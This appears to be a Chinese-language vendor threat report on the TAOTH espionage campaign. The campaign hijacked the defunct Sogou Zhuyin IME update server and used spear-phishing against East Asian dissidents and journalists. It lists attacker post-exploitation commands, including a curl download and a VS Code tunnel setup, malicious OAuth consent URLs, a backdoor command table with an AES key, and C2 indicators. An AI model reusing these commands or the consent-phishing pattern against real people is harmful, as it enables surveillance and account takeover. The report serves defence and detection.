APT & 針對式目標攻擊
搜狗輸入法注音版遭駭客挾持,專挑台灣繁體中文使用者和異議人士下手
早在 2025 年 3 月駭客竄改了搜狗輸入法注音版的正體中文維基百科頁面,並插入一個已遭挾持的網域。這起 TAOTH 攻擊行動鎖定自 2019 年起停止維護的搜狗注音輸入法,透過挾持更新伺服器與註冊網域散布惡意程式。
Save to Folio
重點摘要
- TAOTH 攻擊行動利用一個已廢棄的「搜狗輸入法注音版」更新伺服器和魚叉式網路釣魚行動來散播多個惡意程式家族,包括:TOSHIS、C6DOOR、DESFY 和 GTELAM,主要攻擊對象為東亞地區的使用者。
- 駭客運用了精密的感染過程 (例如挾持軟體更新、假的雲端儲存或登入頁面) 來散布惡意程式並蒐集敏感資訊。
- 根據此攻擊行動的受害者與誘餌文件顯示,它專門瞄準高價值目標,包括異議人士、記者、研究人員以及技術/業務領導人,範圍涵蓋中國、台灣、香港、日本、南韓及海外台灣人。
- 根據我們對其基礎架構與工具的分析,TAOTH 跟先前曾經記載過的一起駭客活動有關,從其幕後操縱 (CC) 基礎架構、惡意程式變種以及攻擊手法可以看出它們背後是同一個持續性的駭客集團,主要從事偵查、間諜活動以及電子郵件濫用。
- Trend Vision One™ 已經可以偵測並攔截本文所列的入侵指標 (IoC),並為客戶提供量身訂做的追蹤查詢、威脅洞見及情報更新。
簡介
今年 6 月,我們發現並調查了一起異常的資安事件,駭客在受害主機上安裝了兩個惡意程式家族:C6DOOR 和 GTELAM。根據我們的調查,惡意程式是經由正常的輸入法 (IME) 軟體「搜狗輸入法注音版」所散布。IME 簡單來說就是一種將一系列按鍵翻譯成複雜字元的工具,專門給無法透過標準 QWERTY 鍵盤輸入其文字的語言使用 (例如東亞地區的許多語言)。
該軟體在 2019 年已停止更新,2024 年 10 月駭客挾持了它已廢棄的網域名稱來散發惡意檔案。根據監測資料顯示,至少有數百人受害,而且被感染之後還會引來後續的攻擊活動。
我們在追蹤其基礎架構時發現,同一集團也正在攻擊東亞地區的高價值人士。本文除了探討使用搜狗輸入法注音版的攻擊之外,也將討論了一起針對日本、韓國、中國和台灣的相關魚叉式網路釣魚行動。
攻擊行動 1:搜狗輸入法注音版
「搜狗輸入法注音版」是由中國一家名為「搜狗」(Sogou) 的科技公司所開發的輸入法 (IME) 軟體。該公司提供了 2 種輸入法版本來支援不同的拼音系統:搜狗輸入法拚音版 (Sogou Pinyin) 和搜狗輸入法注音版 (Sogou Zhuyin)。搜狗輸入法注音版是針對台灣使用者所推出,但從 2019 年起便已不再維護。
根據我們的分析顯示,駭客從 2024 年 10 月起接管了已遭廢棄的更新伺服器,並註冊了該網域來散發惡意的軟體更新。駭客透過這個管道散播了好幾個惡意程式家族,包括 GTELAM、C6DOOR、DESFY 和 TOSHIS。
感染過程
根據維基百科 (Wikipedia) 上已封存的「搜狗輸入法注音版」網頁指出,搜狗輸入法注音版服務已於 2019 年 6 月停止營運,並且不再更新。但從 2024 年 10 月開始,駭客就挾持了已廢棄的官方更新網域 (sogouzhuyin[.]com),並且從 2025 年開始透過該網域來散發官方安裝程式。駭客掌控了搜狗輸入法注音版的更新伺服器之後,便從 2024 年 11 月開始散布惡意的軟體更新。
根據我們的監測資料,駭客在這項行動當中散播了四個不同的惡意程式家族:ToSHIS、DESFY、GELAM 和 C6DOOR。被散播的惡意程式家族各有其不同用途,包括:遠端存取 (RAT)、資訊竊取,以及後門程式功能。為了躲避偵測,駭客還使用了第三方雲端服務來掩蓋其攻擊過程當中的網路活動。
完整的感染過程如下圖所示:
首先,受害者從網際網路下載官方安裝程式。例如,我們發現有人在 2025 年 3 月修改了搜狗輸入法注音版的正體中文維基百科網頁,並在網頁上插入原本正常但現在已被挾持的網域 dl[.]sogouzhuyin[.]com。
我們的分析已確認使用者下載的安裝程式是官方未修改的版本。不過在安裝幾小時之後,就會觸發自動更新程序。其更新程式 ZhuyinUp.exe 會嘗試從以下內嵌網址擷取更新組態設定檔案:
- https[:]//srv-pc[.]sogouzhuyin[.]com/v1/upgrade/version
更新組態設定檔包含了軟體更新安裝程式的網址和 MD5 雜湊碼。軟體更新安裝程式下載完成並通過 MD5 雜湊碼檢查之後,安裝程式就會執行。
根據我們的分析,至少有四個惡意程式家族是經由這項更新機制來散布,包括:DESFY、GELAM、C6DOOR 和 TOSHIS。就目前觀察到的情況,駭客會利用像 DESFY 和 GTELAM 這類惡意程式來分析受害者,藉此發掘高價值的目標。
受害者分析
由於搜狗輸入法注音版瞄準的是注音輸入法的使用者,因此絕大多數的受害者都是在台灣。不過其影響範圍卻不只侷限於台灣,一些海外的台灣人也受到影響,因此遭到攻擊的目標遍布全球。
惡意程式分析
根據我們的分析,被植入到受害環境的惡意程式家族有四個:TOSHIS、DESFY、GTELAM 和 C6DOOR。
TOSHIS
TOSHIS 惡意程式主要作為載入器使用,並且早在去年 12 月開始就出現在這起攻擊行動中,它是 Xiangoop 惡意程式家族的一個變種。TOSHIS 是一個階段性載入器 (stager),它會從 CC 伺服器下載更多惡意檔案。
其感染機制是修改某個正常的可攜式執行檔 (PE) 的進入點來執行惡意 shellcode。這樣的修改可讓惡意程式從外部來源下載並執行其他 shellcode 惡意檔案。趨勢科技的監測資料發現了多個已修改的二進位檔案都跟這項威脅有關,包括:
- SunloginDesktopAgent.exe
- SearchIndexer.exe
- Procmon.exe
被注入到進入點的 shellcode 使用了 Adler-32 演算法來校驗 API 雜湊碼。接著,它會將 CC 資料映射至堆疊內,如下所示:
TOSHIS 只會攻擊使用以下語言 (ID) 的受害者:
- 0x404:zh-TW
- 0x804:zh-CN
- 0x411:ja-JP
我們分析到的所有樣本全都使用「qazxswedcvfrtgbn」作為最終惡意檔案的解密金鑰,這個金鑰與舊的 Xiangoop 樣本下載的惡意檔案所使用的金鑰相同。
根據我們的分析,其最終惡意檔案將是以下其中一種惡意程式:
- COBEACON (Cobalt Strike)
- 適用於 Mythic 框架的 Merlin 代理程式
DESFY
DESFY 工具是一個 2025 年 5 月首度現身的間諜程式,用來蒐集資訊。它會從下列位置蒐集檔案名稱:
- 桌面
- Program Files
蒐集到的檔案名稱,DESFY 會透過 HTTP POST 的方式傳送至 CC 伺服器。此功能很可能是用來分析受害者以尋找適當的攻擊目標。
GTELAM
GTELAM 又是另一個間諜程式,於今年 5 月首次被發現,同樣會竊取受害者的資訊。它不會從特定資料夾蒐集檔案名稱,而是蒐集屬於以下副檔名的所有檔案名稱:
- .doc
- .docx
- .xls
- .xlsx
- .ppt
- .pptx
蒐集到的所有檔案名稱,會使用 AES 加密並傳送至 Google Drive。這表示此工具是專為竊取資訊而設計,用來發掘並優先挑選出高價值目標。
C6DOOR
C6DOOR 是一個使用 Golang 撰寫的客製化後門程式,支援 HTTP 和 WebSocket 兩種通訊協定。值得注意的是,我們蒐集到的樣本中含有的簡體中文字元,這代表駭客可能是中文使用者。
它支援以下指令:
| 指令 | 說明 |
| InformationCli | 蒐集受害者的資訊,包括:IP、OS、使用者名稱、主機名稱。 |
| ExecuteCommandSleep | 設定後門程式指令的間隔時間。 |
| ExecuteCommandHandler | 執行任意的作業系統指令。 |
| ExecuteCommandSsh | 透過 SSH 執行指令。 |
| ExecuteSendDirList | 列出目錄內容。 |
| ExecuteSendDir | 傳送目錄資訊。 |
| ExecuteEcho | 執行「echo」指令。 |
| ExecuteCat | 顯示檔案內容。 |
| ExecuteMkdir | 建立目錄。 |
| ExecuteCopy | 複製檔案。 |
| ExecuteCommandScan | 網路連接埠掃描。 |
| DownloadHandler | 從 CC 伺服器下載檔案。 |
| Downloadfileserver | 將檔案上傳至 CC 伺服器。 |
| ExecuteCommandSftp | 透過 SFTP 傳輸檔案。 |
| ExecScreenshot | 擷取螢幕截圖。 |
| GetAllProcessNames | 列出執行中的處理程序。 |
| Executeshellcode | 將 shellcode (現有檔案) 注入到目標處理程序中。並使用 AES 來解密。 |
| 金鑰: fee8211f723b5bfeb74cc45b0eac7fcd275397ea8f538cf5ea138f12586e5b26 | |
| IV:6679580b03a7e9284f26c5936c8655fa | |
| ExecutePwd | 列印工作目錄。 |
表 1:C6DOOR 可支援的指令。
攻擊後續活動
駭客目前似乎還處於偵查階段,主要目的是搜尋高價值目標。因此,絕大多數受害系統都未再出現進一步的攻擊後續活動。在我們分析到的一個案例中,駭客正在查看受害者的環境,並使用 Visual Studio Code (VSCode) 來建立一個通道。
攻擊後續階段所使用的指令:
C:\Windows\System32\tasklist.exe /svc
C:\Windows\System32\quser.exe
C:\Windows\System32\ipconfig.exe /all
C:\Windows\System32\net.exe time /domain
C:\Windows\System32\net.exe user
C:\Windows\System32\curl.exe cip.cc
C:\Windows\System32\cmd.exe /c ipconfig /all
C:\Windows\System32\cmd.exe /c echo %localappdata%
C:\Windows\System32\cmd.exe /c dir %localappdata%\microsoft
C:\Windows\System32\cmd.exe /c dir %localappdata%\Microsoft\Office
C:\Windows\System32\cmd.exe /c curl -kOJL "https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64" & dir
C:\Windows\System32\cmd.exe /c tar -zxvf vscode_cli_win32_x64_cli.zip & dir .
C:\Windows\System32\cmd.exe /c del /f /q vscode_cli_win32_x64_cli.zip & dir .
C:\Windows\System32\cmd.exe /c code.exe tunnel user login --provider github > z.txt & type z.txt
C:\Windows\System32\cmd.exe /c code.exe tunnel service install
C:\Windows\System32\HOSTNAME.EXE
攻擊行動 2:魚叉式網路釣魚
在進一步調查這起搜狗輸入法注音版攻擊行動時,我們發現有一個 TOSHIS 惡意程式是經由網路釣魚網站散布。根據我們的分析,同一個駭客集團還策劃了另一起針對東亞地區的魚叉式網路釣魚攻擊行動。
趨勢科技監測資料顯示它使用了兩種網路釣魚技巧:
- 透過假的登入頁面將使用者重導至駭客掌控的應用程式,並取得 OAuth 授權同意。
- 透過假的雲端儲存頁面下載 TOSHIS 惡意程式。
此外,我們也發現了一系列政治相關議題的誘餌文件,顯示駭客的目標是東亞地區的記者和異議人士。
受害者分析
受害者主要分布於東亞地區,包括中國、香港、台灣、日本和南韓。另有一小部分受害者被發現位於美國和挪威。
感染過程
在感染過程中,駭客會先發送魚叉式網路釣魚郵件給受害者。這些電子郵件含有網路釣魚網址或誘餌文件,用來引誘收件人點選惡意內容或與其互動。駭客希望能藉此達成以下一項目標:
- 經由 TOSHIS 惡意程式操控受害系統。
- 取得 OAuth 授權同意,進而非法進入和控制受害者的 Google 或 Microsoft 信箱。
誘餌文件
根據我們對誘餌文件的分析,駭客的攻擊目標很可能是以下族群:
- 研究人員
- 異議人士
- 記者
- 技術或業務高階主管
攻擊路徑 1:假的雲端儲存頁面
詐騙網頁的設計會模仿正常的雲端儲存服務。受害者一旦連上該網站,就會自動看到一個提示畫面要求使用者下載名為 material.zip 的壓縮檔。
下圖顯示 material.zip 壓縮檔內的檔案。
此處受害者收到的 PDF 檔案已遭刻意損毀,所以受害者必須點選一個名為 PDFreader.exe 的假 PDF 閱讀器,這是一個正常的 McOds.exe 二進位檔案。當受害者開啟假的 PDF 閱讀器之後,就會經由 DLL 側載方式啟動 McVsoCfg.dll 這個惡意模組。根據進一步分析,McVsoCfg.dll 是 TOSHIS 惡意程式的載入器。它會下載另一個誘餌文件以及惡意 shellcode。最後,經由此感染過程散布的最終惡意檔案是一個 Merlin 代理程式。
攻擊路徑 2:假的登入頁面
詐騙網頁會使用各種吸引人的主題,例如:免費生日禮物、免費折價券,或假的 PDF 閱讀器。當受害者點選其中一個登入按鈕時,就會被重導至一個經過加密編碼的中介頁面,然後再轉導至某個正常的 Google 或 Microsoft 登入網站。
點進去後,會連上一個正常的 OAuth 授權同意網站。我們看到下 OAuth 網址要求使用者同意授權給駭客的應用程式。
- https[:]//accounts[.]google[.]com/o/oauth2/auth?response_type=code&client_id=715259374054-mst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com&redirect_uri=https%3A%2F%2Fwww.auth-web.com%2Fgm-oauth2-callback&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fgmail.modify&state=LWbfFETatSc8EB9zpunfqcf54VsVaR&access_type=offline&include_granted_scopes=true
- https[:]//login[.]microsoftonline[.]com/common/oauth2/v2.0/authorize?scope=offline_access+contacts.read+user.read+mail.read+mail.send&redirect_uri=https%3A%2F%2Fauth.onedrive365-jp.com%2Fgetauthtoken&response_type=code&client_id=e707daa3-579f-4bae-bb7d-89a73d52ffa1
如網址所看到的,OAuth 應用程式會要求取得一些電子郵件的操作權限,例如:gmail.modify 和 mail.read+mail.send。這表示駭客打算利用已遭駭入的電子郵件帳號來進一步攻擊受害者的聯絡人或人脈,進而從事橫向網路釣魚或資料外傳活動。
經過加密編碼的中介頁面可用來當成網站信標。它會發送請求到一個中文訊息推播服務 (sctapi[.]ftqq[.]comI) 來發送信標。該網頁使用了 obfuscator.io 這個公開的服務來加密編碼。以下是解開之後的網站範例。
駭客溯源
根據我們的調查,TAOTH 攻擊行動以及 ITOCHU 的研究所記載的案例 1 和案例 4 當中的駭客活動,都是同一個駭客集團所為,以下幾點可用來佐證:
- 共用的 CC 基礎架構:經過分析發現 TAOTH 與 ITOCHU 的案例所使用的 CC 基礎架構有所重疊,特別是 45[.]32[.]117[.]177。
- 共用工具:TOSHIS 惡意程式是 Xiangoop 的一個變種。不僅如此,兩起調查當中偵測到的 Cobalt Strike 信標都有相同的 CC 位址和浮水印 (520)。
- 類似的手法、技巧與程序 (TTP):駭客採用的方法相同,例如建立 VSCode 通道,並透過正常的應用程式發動供應鏈攻擊,包括「有道」(YouDao) 和「搜狗」(Sogou)。
- 攻擊的地區相同:中國、台灣和香港。
結論
本文探討 TAOTH 攻擊行動,並深入分析駭客如何利用已終止支援的應用程式,藉由軟體更新機制和魚叉式網路釣魚行動來散播惡意程式。
在「搜狗輸入法注音版」攻擊行動當中,駭客一直在低調執行偵查行動,希望從受害者中發掘有價值的目標。為此,駭客使用了 DESFY 和 GTELAM 這類間諜程式來竊取資訊。值得注意的是,GTELAM 會利用 Google Drive 作為傳輸機制來掩蓋其資料外傳動作。至於魚叉式網路釣魚行動,駭客則會發送惡意電子郵件給目標對象來讓目標遭到進一步攻擊。
要主動防範本文描述的類似攻擊,企業應定期檢查其環境是否有任何已終止支援的軟體存在,並立即移除或更換這類應用程式。此外,也建議使用者在從網際網路下載所有檔案時,都要先確認其副檔名,並仔細查看雲端應用程式所要求的權限,然後再決定要不要給予存取權限。
採用 Trend Vision One™ 的主動式防護
Trend Vision One™ 是唯一將資安曝險管理、資安營運以及強大的多層式防護集中在一起的 AI 驅動企業網路資安平台。這套全方位的方法能協助您企業預測及防範威脅,讓您在相關數位資產上加速實現主動式防護的成果。有了 Trend Vision One,您就能消除資安盲點,專心處理最重要的問題,讓資安晉升為支援您創新的策略合作夥伴。
Trend Vision One™ Threat Intelligence
為了隨時掌握不斷演變的威脅,趨勢科技客戶可透過 Trend Vision One™ Threat Insights 來取得 Trend™ Research 有關新興威脅及駭客集團的最新洞見。
Trend Vision One Threat Insights
TAOTH 攻擊行動利用已終止支援的軟體來攻擊繁體中文使用者與異議人士
Trend Vision One Intelligence Reports 應用程式 (IoC 掃描)
TAOTH 攻擊行動利用已終止支援的軟體和網路釣魚來攻擊東亞地區的異議人士與記者
- 追蹤查詢
Trend Vision One Search 應用程式
Trend Vision One 客戶可以使用 Search 應用程式來尋找或追蹤本文提到的惡意指標,看看是否也出現在自己的環境中。
VSAPI 偵測
eventName:MALWARE_DETECTION AND malName:(*TOSHIS* OR *C6DOOR* OR *GTELAM* OR *DESFY*)
網路 – 網域
eventSubId:602 AND (objectHostName: "practicalpublishing.s3.dualstack.us-east-1.amazonaws.com" OR objectHostName: "www.auth-web.com" OR objectHostName: "auth.onedrive365-jp.com")
網路 – IP
eventId:3 AND ( src:"45.32.117.177" OR src:"64.176.50.181" OR src:"154.90.62.210" OR src:"38.60.203.134" OR src:"192.124.176.51" OR dst:"45.32.117.177" OR dst:"64.176.50.181" OR dst:"154.90.62.210" OR dst:"38.60.203.134" OR dst:"192.124.176.51")
入侵指標資料
如需本文提到的入侵指標完整清單,請至此處。